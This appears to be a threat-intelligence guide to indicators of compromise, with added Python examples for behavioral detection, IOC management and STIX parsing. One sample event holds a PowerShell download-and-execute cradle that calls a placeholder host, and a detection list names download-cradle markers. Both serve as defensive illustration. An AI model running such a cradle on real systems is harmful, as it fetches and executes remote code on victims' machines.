TI News Feed · Threat Intelligence Guides

Indicators of Compromise (IOCs): The Complete Guide

Indicators of compromise are the forensic breadcrumbs of an attack. Learn the main IOC types, real examples, IOC vs IOA, the Pyramid of Pain, and how to operationalize them.

Indicators of compromise (IOCs) are pieces of forensic evidence that suggest a network or host has been breached. Think of them as the digital fingerprints an attacker leaves behind — a suspicious IP address, a malicious file hash, an unexpected registry change. IOCs are the most widely used form of technical threat intelligence, and they power the automated detection and blocking that most security tools rely on.

This guide explains what IOCs are, the main types with examples, how they differ from indicators of attack (IOAs), why some IOCs are more valuable than others, and how to use them effectively without drowning your tools in noise.

What is an indicator of compromise?

An IOC is any observable artifact that, when found in your environment, indicates malicious activity may have occurred. IOCs are typically reactive — they describe something that has already been seen in a known attack. When a security vendor analyzes malware, they extract the IOCs and publish them so that everyone else can search their own logs for the same artifacts.

The strength of IOCs is that they're concrete and machine-readable: you can feed a list of malicious domains into a firewall and block them instantly. Their weakness is that they are perishable — attackers rotate infrastructure constantly, so an IOC that's valuable today may be irrelevant next week.

The main types of IOCs

IOCs fall into a few broad categories:

Network-based IOCs

  • IP addresses — command-and-control (C2) servers, scanning hosts, malicious infrastructure.
  • Domain names — phishing domains, C2 domains, malware distribution sites.
  • URLs — specific malicious links and payload locations.
  • Unusual traffic patterns — beaconing to a fixed external host, large outbound transfers, traffic on non-standard ports.

Host-based IOCs

  • File hashes — MD5, SHA-1 or SHA-256 hashes of known malware. A hash matches only the exact file it was computed from: change a single byte and the value changes, so prefer SHA-256 when publishing and expect hash IOCs to miss repacked or recompiled variants.
  • File names and paths — droppers or tools placed in unusual locations.
  • Registry keys — persistence mechanisms on Windows.
  • Mutexes and process artifacts — named mutexes, service names, scheduled tasks and process names that a specific malware family creates while running.

Email-based IOCs

  • Sender addresses and display names used in phishing.
  • Subject lines and attachment names from a campaign.
  • Malicious attachment hashes.

Behavioral IOCs

  • A privileged account logging in at 3 a.m. from a new country.
  • A surge in failed authentications (credential stuffing).
  • A workstation suddenly running administrative tools it never used before.
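Two of the behavioral indicators above, run as detection logic over a constructed authentication log (this is an added example in Python, not code from the original page). The log layout, the thresholds, and the "privileged account" and "home country" lists are assumptions made for the demo.

```python
# Added example, not from the original page: two behavioral checks run over a
# constructed authentication log. Field layout, thresholds and the
# "privileged account" / "home country" lists are assumptions for the demo.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: (timestamp, user, source IP, geo country, result).
AUTH_EVENTS = [
    ("2024-05-01T02:58:00", "svc_backup", "198.51.100.7", "GB", "FAIL"),
    ("2024-05-01T03:00:00", "admin_jane", "192.0.2.10", "US", "OK"),     # home country: quiet
    ("2024-05-01T03:05:00", "admin_jane", "198.51.100.44", "BR", "OK"),  # 3 a.m., new country: alert
    ("2024-05-01T09:14:00", "bob", "192.0.2.21", "US", "FAIL"),
    ("2024-05-01T09:14:20", "bob", "192.0.2.21", "US", "FAIL"),
    ("2024-05-01T09:14:40", "bob", "192.0.2.21", "US", "OK"),            # one user, two typos: not stuffing
    ("2024-05-01T14:00:00", "admin_jane", "198.51.100.80", "GB", "OK"),  # new country but business hours: quiet
] + [
    # Twelve different accounts failing from one IP inside 55 seconds: credential stuffing.
    (f"2024-05-01T10:00:{5 * i:02d}", f"user{i:02d}", "203.0.113.9", "DE", "FAIL")
    for i in range(12)
]

PRIVILEGED = {"admin_jane", "svc_backup"}                        # assumed privileged accounts
HOME_COUNTRIES = {"admin_jane": {"US"}, "svc_backup": {"US"}}    # assumed per-account baseline
BUSINESS_HOURS = range(7, 20)                                    # assumed: 07:00 to 19:59 local


def parse(row):
    ts, user, ip, country, result = row
    return {"ts": datetime.fromisoformat(ts), "user": user, "ip": ip,
            "country": country, "ok": result == "OK"}


def failed_auth_surge(events, window=timedelta(minutes=5), threshold=10, min_users=3):
    """Return {source_ip: (failures, distinct_users)} for IPs that produce at least
    `threshold` failures against at least `min_users` accounts inside any `window`.
    The distinct-user requirement separates stuffing from one user mistyping a password."""
    by_ip = defaultdict(list)
    for e in events:
        if not e["ok"]:
            by_ip[e["ip"]].append(e)
    hits = {}
    for ip, fails in by_ip.items():
        fails.sort(key=lambda e: e["ts"])
        best, start = None, 0
        for end in range(len(fails)):                  # sliding window over sorted failures
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            span = fails[start:end + 1]
            users = {e["user"] for e in span}
            if len(span) >= threshold and len(users) >= min_users:
                if best is None or len(span) > best[0]:
                    best = (len(span), len(users))
        if best:
            hits[ip] = best
    return hits


def anomalous_privileged_login(events):
    """Successful login by a privileged account, outside business hours, from a country
    that account has never been seen in. Returns (user, country, timestamp) tuples."""
    alerts = []
    for e in events:
        if not (e["ok"] and e["user"] in PRIVILEGED):
            continue
        new_country = e["country"] not in HOME_COUNTRIES.get(e["user"], set())
        off_hours = e["ts"].hour not in BUSINESS_HOURS
        if new_country and off_hours:
            alerts.append((e["user"], e["country"], e["ts"].isoformat()))
    return alerts


if __name__ == "__main__":
    events = [parse(r) for r in AUTH_EVENTS]
    print("credential stuffing sources:", failed_auth_surge(events))
    print("anomalous privileged logins:", anomalous_privileged_login(events))
```

The distinct-user condition is what keeps the surge rule from firing on a single user who mistypes a password a few times, and the two-condition login rule (new country and off hours) is deliberately conservative; loosen either and the behavioral indicator turns into an alert source nobody reads.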

IOCs vs IOAs: a crucial distinction

An indicator of compromise (IOC) tells you an attack has happened — it's evidence after the fact. An indicator of attack (IOA) focuses on the intent and behavior of an attack as it unfolds, regardless of the specific tools used.

For example, a specific malicious file hash is an IOC. The behavior of "a document spawning PowerShell, which downloads and executes a payload" is an IOA — it catches the technique even if the attacker swaps in a brand-new file the world has never seen. IOAs map closely to adversary TTPs and the MITRE ATT&CK framework. Strong programs use both: IOCs for fast, cheap blocking and IOAs for catching novel attacks.

The Pyramid of Pain: not all IOCs are equal

Security researcher David Bianco's Pyramid of Pain ranks indicators by how much it hurts the adversary when you deny them. From bottom (trivial for attackers to change) to top (very painful):

  1. Hash values — trivial to change; altering a single byte, let alone recompiling or repacking, produces a new hash.
  2. IP addresses — easy to rotate.
  3. Domain names — slightly harder, but still cheap to register.
  4. Network/host artifacts — more annoying to change: a User-Agent string, URI pattern, file path or registry key baked into the tooling.
  5. Tools — costly for an attacker to replace.
  6. TTPs — the most painful; changing how they operate forces a fundamental rethink.

The lesson: blocking hashes and IPs is useful but easily evaded. Detecting at the TTP level imposes real cost on adversaries and stays effective far longer. This is why mature teams invest in behavior-based detection and threat hunting, not just indicator blocklists.
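The IOC-versus-IOA distinction and the Pyramid of Pain make the same point from two angles, so one added example (in Python, not code from the original page) covers both: the same Office-document-spawns-PowerShell technique is seen twice, once with the file hash a vendor already published and once after the attacker rebuilds the payload. The hash blocklist catches only the first; a behavior rule on the parent/child process chain catches both. The process events, the payload bytes, the Office/shell lists and the command-line markers are all constructed for the demo, and the dropped-file hash field is assumed to be enrichment an EDR would supply.

```python
# Added example, not from the original page: a hash IOC next to a behavior IOA,
# run over constructed EDR-style process events. Lists and markers are assumptions.
import hashlib

# Constructed payloads: the sample a vendor analyzed, and a rebuilt one differing in one byte.
KNOWN_PAYLOAD = b"MZ\x90\x00 constructed dropper build 1"
REBUILT_PAYLOAD = b"MZ\x90\x00 constructed dropper build 2"


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# IOC: the published SHA-256 blocklist (bottom of the Pyramid of Pain).
HASH_BLOCKLIST = {sha256(KNOWN_PAYLOAD)}

# IOA: "an Office app spawns a shell that fetches or decodes code" (a TTP, top of the pyramid).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex ", "iex(",
                  "-enc", "-encodedcommand", "frombase64string")

# Constructed process-creation events. `dropped_sha256` is assumed to be the hash of the
# file the child process wrote, as an EDR would enrich the event.
EVENTS = [
    {"host": "ws01", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                ".DownloadString('http://update-portal.example/a')",
     "dropped_sha256": sha256(KNOWN_PAYLOAD)},
    {"host": "ws02", "parent": "EXCEL.EXE", "image": "powershell.exe",
     # "SQBFAFgA" is base64 of UTF-16LE "IEX", the usual opening of an encoded cradle
     "cmdline": "powershell.exe -w hidden -enc SQBFAFgA",
     "dropped_sha256": sha256(REBUILT_PAYLOAD)},
    {"host": "ws03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe", "dropped_sha256": None},   # an admin opening a console
]


def ioc_match(event):
    """IOC check: is the dropped file's hash on the blocklist?"""
    return event["dropped_sha256"] in HASH_BLOCKLIST


def ioa_office_spawns_shell(event):
    """IOA check: Office parent, scripting/shell child, and a download-or-decode marker in
    the command line. Returns the matched markers, or None if the rule does not fire."""
    if event["parent"].lower() not in OFFICE_APPS or event["image"].lower() not in SHELLS:
        return None
    cmd = event["cmdline"].lower()
    markers = [m for m in CRADLE_MARKERS if m in cmd]
    return markers or None


def triage(events):
    """(host, ioc_hit, ioa_hit) per event."""
    return [(e["host"], ioc_match(e), ioa_office_spawns_shell(e) is not None) for e in events]


if __name__ == "__main__":
    for host, ioc, ioa in triage(EVENTS):
        print(f"{host}: hash IOC={'HIT' if ioc else 'miss'}  behavior IOA={'HIT' if ioa else 'miss'}")
```

Rebuilding the payload cost the attacker one compile and defeated the hash entirely; defeating the behavior rule means giving up Office macros as the initial-execution vector, or finding a way to run a cradle without spawning a shell, which is the "fundamental rethink" the pyramid describes.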

How IOCs are shared

IOCs are exchanged in standardized formats so tools can ingest them automatically. The most common are STIX (Structured Threat Information Expression), a language for describing threat data, and TAXII, a protocol for transporting it. Many organizations share IOCs through platforms like MISP and OpenCTI, covered in our guide to open-source threat intelligence tools.

How to use IOCs effectively

To get value from IOCs without creating noise:

  1. Automate ingestion. Pipe IOCs from trusted feeds into your SIEM, EDR and firewalls.
  2. Add context. An IOC without context (what campaign, what confidence, what date) is hard to act on. Enrich before you alert.
  3. Expire aggressively. Because IOCs perish, set expiration dates so stale indicators don't bloat your tools or trigger false positives forever.
  4. Prioritize by relevance. An IOC tied to an actor targeting your industry matters more than a generic one. Rank, don't just collect.
  5. Hunt retroactively. When fresh IOCs are published, search historical logs — you may find the attacker was already inside.
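The five steps above as one small indicator store, walked end to end over constructed feed records and constructed historical log lines (an added example in Python, not code from the original page or from any product). The feed names, campaign names, TTL values, the "our sector" setting and the scoring weights are assumptions chosen for the demo; the deduplication, expiry, ranking and retro-hunt logic is the point.

```python
# Added example, not from the original page: ingest, enrich, expire, prioritize and
# retro-hunt over constructed data. Feed names, TTLs and weights are assumptions.
import hashlib
import re
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
OUR_SECTOR = "finance"                          # assumed: what "relevant to us" means
SAMPLE_HASH = hashlib.sha256(b"constructed sample").hexdigest()

# Step 3, expiry: infrastructure rots fast, hashes slowly. Assumed values.
TTL = {"ip": timedelta(days=14), "domain": timedelta(days=30), "sha256": timedelta(days=180)}

# Constructed records as several feeds might publish them (note the duplicate domain).
FEED_RECORDS = [
    {"source": "feedA", "kind": "domain", "value": "Update-Portal.EXAMPLE", "campaign": "OpA",
     "sectors": ["finance"], "confidence": 80, "first_seen": NOW - timedelta(days=3)},
    {"source": "feedB", "kind": "domain", "value": "update-portal.example", "campaign": "OpA",
     "sectors": ["finance"], "confidence": 70, "first_seen": NOW - timedelta(days=4)},
    {"source": "feedA", "kind": "ip", "value": "203.0.113.9", "campaign": "OpA",
     "sectors": ["finance"], "confidence": 60, "first_seen": NOW - timedelta(days=2)},
    {"source": "feedC", "kind": "ip", "value": "198.51.100.7", "campaign": "mass scanning",
     "sectors": [], "confidence": 50, "first_seen": NOW - timedelta(days=40)},   # stale
    {"source": "feedC", "kind": "sha256", "value": SAMPLE_HASH, "campaign": "OpB",
     "sectors": ["healthcare"], "confidence": 90, "first_seen": NOW - timedelta(days=10)},
]

# Constructed historical proxy/firewall lines to hunt through.
HISTORICAL_LOGS = [
    "2024-05-30T11:02:13 proxy user=bob dst=update-portal.example:443 bytes=5120",
    "2024-05-30T11:02:14 proxy user=bob dst=198.51.100.70:443 bytes=1",   # not 198.51.100.7
    "2024-05-31T08:44:01 fw allow src=10.0.0.5 dst=203.0.113.9 dport=8443",
]


@dataclass
class Indicator:
    kind: str
    value: str
    sources: set
    campaign: str
    target_sectors: set
    confidence: int          # 0-100
    first_seen: datetime
    ttl: timedelta

    def expired(self, now):
        return now > self.first_seen + self.ttl


def ingest(records):
    """Steps 1 and 2: normalize, deduplicate across feeds, and keep the context merged."""
    store = {}
    for r in records:
        key = (r["kind"], r["value"].strip().lower())
        if key in store:
            ind = store[key]
            ind.sources.add(r["source"])
            ind.target_sectors.update(r["sectors"])
            ind.confidence = max(ind.confidence, r["confidence"])
            ind.first_seen = min(ind.first_seen, r["first_seen"])   # age from the earliest sighting
        else:
            store[key] = Indicator(kind=key[0], value=key[1], sources={r["source"]},
                                   campaign=r["campaign"], target_sectors=set(r["sectors"]),
                                   confidence=r["confidence"], first_seen=r["first_seen"],
                                   ttl=TTL[key[0]])
    return store


def score(ind):
    """Step 4: relevance ranking, higher first. Weights are assumptions."""
    s = ind.confidence
    if OUR_SECTOR in ind.target_sectors:
        s += 40                                  # actor targets our industry
    s += 10 * (len(ind.sources) - 1)             # independent corroboration
    return s


def active_ranked(store, now):
    """Step 3 applied, then step 4: drop expired indicators and rank the rest."""
    live = [i for i in store.values() if not i.expired(now)]
    return sorted(live, key=score, reverse=True)


def retro_hunt(indicators, log_lines):
    """Step 5: look for live indicator values in old logs. Lines are tokenized so that
    198.51.100.7 does not match inside 198.51.100.70."""
    hits = []
    for line in log_lines:
        tokens = set(re.findall(r"[a-z0-9][a-z0-9.\-]*", line.lower()))
        for ind in indicators:
            if ind.value in tokens:
                hits.append((ind.value, ind.campaign, line))
    return hits


if __name__ == "__main__":
    ranked = active_ranked(ingest(FEED_RECORDS), NOW)
    for ind in ranked:
        print(f"{score(ind):>4} {ind.kind:<7} {ind.value} sources={sorted(ind.sources)}")
    for value, campaign, line in retro_hunt(ranked, HISTORICAL_LOGS):
        print(f"RETRO HIT [{campaign}] {value}: {line}")
```

Two details carry most of the value: the store key is normalized (case and whitespace) so the same domain from two feeds becomes one indicator with both sources and the earliest sighting, and the hunt tokenizes log lines rather than doing substring search, which is the usual source of false matches on IP prefixes and on hashes embedded in longer strings.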

IOC formats and where to find them

To be useful at scale, IOCs need to be structured and shareable. STIX over TAXII, introduced above, is the most common machine-readable pairing, but you'll also encounter simpler forms such as plain CSV lists, OpenIOC and YARA rules (which match byte and string patterns inside files rather than listing static artifacts). Agreeing on a standard format is what lets one organization's research automatically update another organization's defenses.
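What consuming STIX looks like in practice, as an added example in Python (not code from the original page or from any STIX library): a small parser that pulls plain (kind, value) indicators out of a STIX 2.1 bundle so they can be loaded into a blocklist or SIEM lookup. The bundle is constructed (ids, dates and values are made up), and the parser deliberately handles only patterns built from simple single-property comparisons joined by OR, which is the shape most shared atomic indicators take; compound patterns are skipped rather than mis-split.

```python
# Added example, not from the original page: extracting atomic indicators from a
# constructed STIX 2.1 bundle. Only simple comparison patterns are handled.
import hashlib
import json
import re

SAMPLE_HASH = hashlib.sha256(b"constructed sample").hexdigest()


def sdo(obj_type, uuid, **props):
    """Build a minimal STIX 2.1 object carrying the common required properties."""
    base = {"type": obj_type, "spec_version": "2.1", "id": f"{obj_type}--{uuid}",
            "created": "2024-05-28T09:00:00.000Z", "modified": "2024-05-28T09:00:00.000Z"}
    return {**base, **props}


def indicator(uuid, pattern, valid_until=None):
    props = {"indicator_types": ["malicious-activity"], "pattern_type": "stix",
             "pattern": pattern, "valid_from": "2024-05-28T00:00:00Z"}
    if valid_until:
        props["valid_until"] = valid_until
    return sdo("indicator", uuid, **props)


# Constructed bundle: five indicators and one malware object, as a TAXII collection might return them.
BUNDLE_JSON = json.dumps({
    "type": "bundle", "id": "bundle--4d1f0f2e-7d2a-4e83-9a4b-0c1d2e3f4a5b",
    "objects": [
        indicator("1b1fd0c5-0b62-4d67-8f5b-5a1e0a6d2c01",
                  "[domain-name:value = 'update-portal.example']", "2024-06-27T00:00:00Z"),
        indicator("1b1fd0c5-0b62-4d67-8f5b-5a1e0a6d2c02", "[ipv4-addr:value = '203.0.113.9']"),
        indicator("1b1fd0c5-0b62-4d67-8f5b-5a1e0a6d2c03", f"[file:hashes.'SHA-256' = '{SAMPLE_HASH}']"),
        indicator("1b1fd0c5-0b62-4d67-8f5b-5a1e0a6d2c04",
                  "[ipv4-addr:value = '198.51.100.7'] OR [domain-name:value = 'mirror.example']"),
        # Both observables must occur together; splitting this into two atomic IOCs would be wrong.
        indicator("1b1fd0c5-0b62-4d67-8f5b-5a1e0a6d2c05",
                  "[file:name = 'invoice.docm'] AND [process:name = 'powershell.exe']"),
        sdo("malware", "9e2c1a7b-3f4d-4c5e-8a6b-7c8d9e0f1a2b", name="ConstructedLoader", is_family=False),
    ],
})

COMPARISON = re.compile(r"\[\s*([\w-]+):([\w.'-]+)\s*=\s*'([^']*)'\s*\]")
UNSUPPORTED = re.compile(r"\b(AND|FOLLOWEDBY|WITHIN|REPEATS|START|STOP)\b")
KIND = {("ipv4-addr", "value"): "ipv4", ("ipv6-addr", "value"): "ipv6",
        ("domain-name", "value"): "domain", ("url", "value"): "url",
        ("file", "hashes.'SHA-256'"): "sha256", ("file", "hashes.'SHA-1'"): "sha1",
        ("file", "hashes.MD5"): "md5", ("email-addr", "value"): "email"}


def extract_indicators(bundle_text):
    """Return a list of {kind, value, stix_id, valid_from, valid_until} dicts."""
    out = []
    for obj in json.loads(bundle_text).get("objects", []):
        if obj.get("type") != "indicator" or obj.get("revoked"):
            continue
        if obj.get("pattern_type", "stix") != "stix":
            continue                          # yara/sigma/snort patterns belong to other tools
        pattern = obj["pattern"]
        if UNSUPPORTED.search(pattern):
            continue                          # compound pattern, not separable into atomic IOCs
        for obj_type, prop, value in COMPARISON.findall(pattern):
            kind = KIND.get((obj_type, prop))
            if kind is None:
                continue                      # property we have no lookup for (process:name etc.)
            out.append({"kind": kind,
                        "value": value if kind == "url" else value.lower(),   # URL paths are case-sensitive
                        "stix_id": obj["id"],
                        "valid_from": obj.get("valid_from"),
                        "valid_until": obj.get("valid_until")})
    return out


if __name__ == "__main__":
    for ind in extract_indicators(BUNDLE_JSON):
        print(f"{ind['kind']:<7} {ind['value']}  until={ind['valid_until']}")
```

The `valid_until` field is carried through untouched because it is the producer's own expiry, and a consumer that ignores it ends up blocking on indicators the publisher has already retired. Real feeds also carry `revoked` objects and non-STIX `pattern_type` values, which is why the parser checks both before touching the pattern.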

Reliable, free sources of IOCs include:

  • Government and CERT advisories — such as CISA alerts, which frequently publish indicators for active campaigns.
  • abuse.ch projects — URLhaus, ThreatFox, MalwareBazaar and Feodo Tracker provide high-quality, community-curated indicators.
  • Vendor threat research — detailed write-ups that include the IOCs extracted during analysis.
  • Sharing communities — ISACs and platforms like MISP, covered in our guide to open-source threat intelligence tools.

The practical challenge is that the same campaign is reported by many sources at once, producing duplicates and noise. A feed that aggregates and deduplicates these sources — and timestamps each item so you can judge freshness — saves analysts hours of manual collection and keeps the indicator set both current and clean.

The bottom line

IOCs are the fast, concrete, machine-readable layer of threat intelligence — essential for rapid detection and blocking, but perishable and easy for attackers to change. Use them aggressively for what they're good at, pair them with behavior-based detection (IOAs and TTPs) for resilience, and keep your indicators fresh. Speed matters: the faster you learn about a new campaign's IOCs, the sooner you can hunt for them. Our live threat intelligence feed surfaces breaking research — often including fresh indicators — from dozens of sources within minutes, ranked by priority.

Frequently asked questions

What is an indicator of compromise (IOC)?

An IOC is a piece of forensic evidence — such as a malicious IP, domain, URL, file hash or registry key — that indicates a system may have been breached. IOCs are used to detect and block known malicious activity automatically.

What is the difference between an IOC and an IOA?

An indicator of compromise (IOC) is evidence that an attack already happened, like a known-bad file hash. An indicator of attack (IOA) focuses on the behavior and intent of an attack in progress, so it can catch novel techniques even when the specific tools or files are brand new.

What are the main types of IOCs?

IOCs are generally grouped into network-based (IPs, domains, URLs), host-based (file hashes, registry keys, file paths), email-based (sender addresses, attachment hashes) and behavioral (anomalous logins, unusual process activity) indicators.

Why do IOCs expire?

Attackers constantly rotate their infrastructure — registering new domains, changing IP addresses and recompiling malware to produce new hashes. As a result, a given IOC may only be valuable for hours or days, which is why teams expire indicators and prioritize behavior-based detection.